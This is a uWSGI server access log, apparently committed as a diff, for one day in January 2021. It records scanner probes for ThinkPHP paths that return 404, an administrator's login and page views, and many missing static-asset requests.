switches on core 0) +Not Found: /TP/index.php +[pid: 12823|app: 0|req: 840/1118] 36.27.208.157 () {30 vars in 435 bytes} [Tue Jan 12 01:42:23 2021] GET /TP/index.php => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /thinkphp/html/public/index.php +[pid: 12823|app: 0|req: 841/1119] 36.27.208.157 () {30 vars in 471 bytes} [Tue Jan 12 01:42:23 2021] GET /thinkphp/html/public/index.php => generated 3454 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /html/public/index.php +[pid: 12823|app: 0|req: 842/1120] 36.27.208.157 () {30 vars in 453 bytes} [Tue Jan 12 01:42:23 2021] GET /html/public/index.php => generated 3427 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /public/index.php +[pid: 12823|app: 0|req: 843/1121] 36.27.208.157 () {30 vars in 443 bytes} [Tue Jan 12 01:42:23 2021] GET /public/index.php => generated 3412 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /TP/html/public/index.php +[pid: 12823|app: 0|req: 844/1122] 36.27.208.157 () {30 vars in 459 bytes} [Tue Jan 12 01:42:23 2021] GET /TP/html/public/index.php => generated 3436 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /elrekt.php +[pid: 12823|app: 0|req: 845/1123] 36.27.208.157 () {30 vars in 431 bytes} [Tue Jan 12 01:42:23 2021] GET /elrekt.php => generated 3394 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /index.php +[pid: 12823|app: 0|req: 846/1124] 36.27.208.157 () {30 vars in 429 bytes} [Tue Jan 12 01:42:23 2021] GET /index.php => generated 3391 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /users +[pid: 12823|app: 0|req: 847/1125] 36.27.208.157 () {34 vars in 517 bytes} [Tue Jan 12 01:42:23 2021] POST /users?page=&size=5 => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 848/1126] 36.27.208.157 () {30 vars in 411 bytes} [Tue Jan 12 01:42:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 849/1127] 128.14.234.165 () {30 vars in 355 bytes} [Tue Jan 12 02:07:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 12823|app: 0|req: 850/1128] 128.14.234.165 () {30 vars in 376 bytes} [Tue Jan 12 02:07:11 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 851/1129] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 02:26:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +invalid request block size: 34826 (max 4096)...skip +[uwsgi-http key: 212.64.67.134:8080 client_addr: 101.89.19.140 client_port: 34034] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647] +[pid: 12823|app: 0|req: 852/1130] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 03:07:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 853/1131] 83.97.20.25 () {22 vars in 223 bytes} [Tue Jan 12 03:31:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 854/1132] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 03:57:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 855/1133] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 04:40:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 856/1134] 219.228.146.225 () {38 vars in 789 bytes} [Tue Jan 12 05:00:51 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 857/1135] 219.228.146.225 () {40 vars in 845 bytes} [Tue Jan 12 05:02:00 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 858/1136] 219.228.146.225 () {40 vars in 848 bytes} [Tue Jan 12 05:02:00 2021] GET /my-admin/ => generated 5354 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 859/1137] 219.228.146.225 () {38 vars in 806 bytes} [Tue Jan 12 05:02:02 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1138] 219.228.146.225 () {38 vars in 867 bytes} [Tue Jan 12 05:02:04 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 860/1139] 219.228.146.225 () {48 vars in 1010 bytes} [Tue Jan 12 05:02:13 2021] POST /my-admin/ => generated 27 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 861/1140] 219.228.146.225 () {40 vars in 859 bytes} [Tue Jan 12 05:02:13 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 862/1141] 219.228.146.225 () {40 vars in 861 bytes} [Tue Jan 12 05:02:13 2021] GET /admin-home/ => generated 9586 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1142] 219.228.146.225 () {38 vars in 801 bytes} [Tue Jan 12 05:02:13 2021] GET /static/css/style.css => generated 118751 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1143] 219.228.146.225 () {38 vars in 813 bytes} [Tue Jan 12 05:02:13 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1144] 219.228.146.225 () {38 vars in 867 bytes} [Tue Jan 12 05:02:13 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 4 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1145] 219.228.146.225 () {38 vars in 830 bytes} [Tue Jan 12 05:02:13 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1146] 219.228.146.225 () {38 vars in 848 bytes} [Tue Jan 12 05:02:13 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1147] 219.228.146.225 () {38 vars in 806 bytes} [Tue Jan 12 05:02:15 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1148] 219.228.146.225 () {38 vars in 782 bytes} [Tue Jan 12 05:02:15 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1149] 219.228.146.225 () {38 vars in 870 bytes} [Tue Jan 12 05:02:15 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 11 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1150] 219.228.146.225 () {38 vars in 792 bytes} [Tue Jan 12 05:02:15 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1151] 219.228.146.225 () {38 vars in 866 bytes} [Tue Jan 12 05:02:15 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1152] 219.228.146.225 () {38 vars in 842 bytes} [Tue Jan 12 05:02:15 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1153] 219.228.146.225 () {38 vars in 794 bytes} [Tue Jan 12 05:02:16 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 863/1154] 219.228.146.225 () {38 vars in 871 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 864/1155] 219.228.146.225 () {38 vars in 883 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 865/1156] 219.228.146.225 () {38 vars in 875 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 866/1157] 219.228.146.225 () {38 vars in 860 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 867/1158] 219.228.146.225 () {38 vars in 859 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 868/1159] 219.228.146.225 () {38 vars in 915 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 869/1160] 219.228.146.225 () {38 vars in 807 bytes} [Tue Jan 12 05:02:16 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 870/1161] 219.228.146.225 () {38 vars in 805 bytes} [Tue Jan 12 05:02:16 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 871/1162] 219.228.146.225 () {38 vars in 840 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 872/1163] 219.228.146.225 () {40 vars in 865 bytes} [Tue Jan 12 05:02:23 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 873/1164] 219.228.146.225 () {40 vars in 867 bytes} [Tue Jan 12 05:02:23 2021] GET /announcement/ => generated 8250 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 874/1165] 219.228.146.225 () {38 vars in 873 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 875/1166] 219.228.146.225 () {38 vars in 878 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 876/1167] 219.228.146.225 () {38 vars in 886 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 877/1168] 219.228.146.225 () {38 vars in 842 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 878/1169] 219.228.146.225 () {38 vars in 862 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 879/1170] 219.228.146.225 () {38 vars in 918 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 880/1171] 219.228.146.225 () {38 vars in 810 bytes} [Tue Jan 12 05:02:23 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 881/1172] 219.228.146.225 () {38 vars in 862 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 882/1173] 219.228.146.225 () {38 vars in 808 bytes} [Tue Jan 12 05:02:23 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 883/1174] 219.228.146.225 () {40 vars in 866 bytes} [Tue Jan 12 05:02:25 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 884/1175] 219.228.146.225 () {40 vars in 868 bytes} [Tue Jan 12 05:02:25 2021] GET /kind-manage/ => generated 12023 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 885/1176] 219.228.146.225 () {38 vars in 873 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 886/1177] 219.228.146.225 () {38 vars in 885 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 887/1178] 219.228.146.225 () {38 vars in 877 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 888/1179] 219.228.146.225 () {38 vars in 841 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 889/1180] 219.228.146.225 () {38 vars in 861 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 890/1181] 219.228.146.225 () {38 vars in 861 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 891/1182] 219.228.146.225 () {38 vars in 809 bytes} [Tue Jan 12 05:02:25 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 892/1183] 219.228.146.225 () {38 vars in 807 bytes} [Tue Jan 12 05:02:25 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 893/1184] 219.228.146.225 () {38 vars in 917 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 894/1185] 219.228.146.225 () {40 vars in 869 bytes} [Tue Jan 12 05:02:29 2021] GET /announcement/ => generated 8250 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 895/1186] 219.228.146.225 () {38 vars in 874 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 896/1187] 219.228.146.225 () {38 vars in 886 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 897/1188] 219.228.146.225 () {38 vars in 878 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 898/1189] 219.228.146.225 () {38 vars in 842 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 899/1190] 219.228.146.225 () {38 vars in 862 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 900/1191] 219.228.146.225 () {38 vars in 918 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 901/1192] 219.228.146.225 () {38 vars in 810 bytes} [Tue Jan 12 05:02:29 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 902/1193] 219.228.146.225 () {38 vars in 808 bytes} [Tue Jan 12 05:02:29 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 903/1194] 219.228.146.225 () {38 vars in 862 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 904/1195] 219.228.146.225 () {40 vars in 866 bytes} [Tue Jan 12 05:02:30 2021] GET /admin-home/ => generated 9586 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 905/1196] 219.228.146.225 () {38 vars in 872 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 906/1197] 219.228.146.225 () {38 vars in 884 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 907/1198] 219.228.146.225 () {38 vars in 876 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 908/1199] 219.228.146.225 () {38 vars in 840 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 909/1200] 219.228.146.225 () {38 vars in 860 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 910/1201] 219.228.146.225 () {38 vars in 860 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 911/1202] 219.228.146.225 () {38 vars in 916 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 912/1203] 219.228.146.225 () {38 vars in 808 bytes} [Tue Jan 12 05:02:30 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 913/1204] 219.228.146.225 () {38 vars in 806 bytes} [Tue Jan 12 05:02:30 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 914/1205] 61.151.178.197 () {32 vars in 648 bytes} [Tue Jan 12 05:11:58 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 915/1206] 101.89.239.232 () {32 vars in 608 bytes} [Tue Jan 12 05:12:05 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 916/1207] 61.129.6.151 () {32 vars in 632 bytes} [Tue Jan 12 05:12:06 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 917/1208] 61.129.7.235 () {32 vars in 557 bytes} [Tue Jan 12 05:12:20 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 918/1209] 167.248.133.38 () {24 vars in 257 bytes} [Tue Jan 12 05:19:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 919/1210] 167.248.133.38 () {30 vars in 392 bytes} [Tue Jan 12 05:19:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 920/1211] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 05:26:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 921/1212] 219.228.146.225 () {38 vars in 789 bytes} [Tue Jan 12 05:36:58 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 922/1213] 219.228.146.225 () {36 vars in 677 bytes} [Tue Jan 12 05:38:45 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1214] 219.228.146.225 () {38 vars in 776 bytes} [Tue Jan 12 05:38:45 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1215] 219.228.146.225 () {38 vars in 798 bytes} [Tue Jan 12 05:38:45 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1216] 219.228.146.225 () {38 vars in 780 bytes} [Tue Jan 12 05:38:45 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1217] 219.228.146.225 () {38 vars in 778 bytes} [Tue Jan 12 05:38:45 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1218] 219.228.146.225 () {38 vars in 759 bytes} [Tue Jan 12 05:38:45 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1219] 219.228.146.225 () {38 vars in 755 bytes} [Tue Jan 12 05:38:45 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 